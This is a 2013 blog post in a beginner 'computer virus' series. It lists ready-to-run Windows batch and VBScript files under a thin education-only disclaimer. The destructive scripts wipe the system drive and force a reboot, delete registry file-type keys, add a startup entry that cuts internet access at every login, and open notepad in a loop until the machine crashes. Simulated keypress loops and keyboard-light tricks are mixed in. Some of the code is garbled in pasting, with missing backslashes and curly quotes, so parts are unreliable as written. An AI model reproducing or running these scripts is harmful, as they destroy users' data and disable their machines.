Wednesday, May 8, 2013

computer virus (part 4)- programming

(cont..) of part -3(click here for part 3)

NOTE :

The articles in this blog are completely for education purpose only, In any manner the author /blog do not intent to encourage to do hacking over the network,In case any sense the issues caused by you, the author responsible for your work ,its your own risk  please have a kind sense and be ETHICAL  



in the previous article , three simple programs prescribed as example of virus, at the instance of reading the last article , i am sure, you might  had a doubt , how can be these simple programs  as virus programs .If it is the question is than the answer is yes , Its virus programs .

let us  see how , use your common sense beyond the technical sense, what is virus -"virus is a program or a set of programs that makes changes in the behaviour of electronic device (computer /mobile device etc) may work out of user control or may be certain behaviour  that differ from regular behaviour  "
still no clear idea,consider this scenario of program (which opens browser), if i include  "infinite loop" where the main instruction (the instructions that are used awake browser) than browser program start to open after some time it(operating system) says the browser stops working- isn't is beyond from regular behaviour , that's what virus is ..! its a common virus program..

there is some other programs which makes the RAM usage 100%. actually it starts its excution with the usage small amount of memory , later it makes the RAM usage to peak level , once the usage cross the peak stage than the system will hang itself.

there may be some programs designed to grab the sensitive information from user electronic device

here some more program examples, the following programs makes the use windows API (the following programs included system calls)

note :
do not try the following programs on your system, these are for education purpose only, in any manner the author /blog is not responsible damage caused by you..

>>This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code a .bat file
-----------------------------------------------------------------------------------------------------------

>>Disable Internet Permanently
Save As A bat File

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE






------------------------------------------------------------------------------------------------------------

>>The Most Simple Virus To Crush The Window

@Echo off
Del C:\ *.* |y

Save It As Anything.bat
------------------------------------------------------------------------------------------------------------

>>Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]

This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)*

Code:-

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked.  Have a nice day.
GOTO MESSAGE


------------------------------------------------------------------------------------------------------------
Endless Notepads

*This will pop up endless notepads until the computer freezes and crashes*

Code:-

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

------------------------------------------------------------------------------------------------------------
Endless Enter

*This constantly makes it so the enter button is being pressed continuesly*

Code:-

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

------------------------------------------------------------------------------------------------------------
Endless Backspace

*This makes it so the backspace key is constantly being pressed*

Code:-

MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

------------------------------------------------------------------------------------------------------------
Make Your Keyboard Disco Light

This trick just makes your keyboard lights do disco.
The script I’m sharing with you, when executed makes your Caps, Num and Scroll Lock’s light flash in a cool rhythmic way!

1.This piece of code makes your keyboard a live disco..

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop

2.This one makes it looks like a chain of light….

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 200
wshshell.sendkeys “{CAPSLOCK}”
wscript.sleep 100
wshshell.sendkeys “{NUMLOCK}”
wscript.sleep 50
wshshell.sendkeys “{SCROLLLOCK}”
loop

Instructions:
*paste any of the two above codes in notepad
*Save as “AnyFileName”.vbs
*Run the file
*To stop, launch task manager and then under “Processes” end “wscript.exe”

I hope u would like it..

------------------------------------------------------------------------------------------------------------
many times we have seen our system/pc antivirus disabled automatically , but we really wondered how it was done by hackers , its very simple , actually they send you a copy of spy software (for example you have downloaded a vlc player from internet from a third party website so that file may include some extra programming means maybe  virus )

i am unable to share this program because  its cross the limits ethics so not sharing.... hope it will be useful

in the next post we will see , how the antivirus  programs work to detect the virus programs in short time




------------------------------------------------------------------------------------------------------------
NOTE :

The articles in this blog are completely for education purpose only, In any manner the author /blog do not intent to encourage to do hacking over the network,In case any sense the issues caused by you, the author responsible for your work ,its your own risk  please have a kind sense and be ETHICAL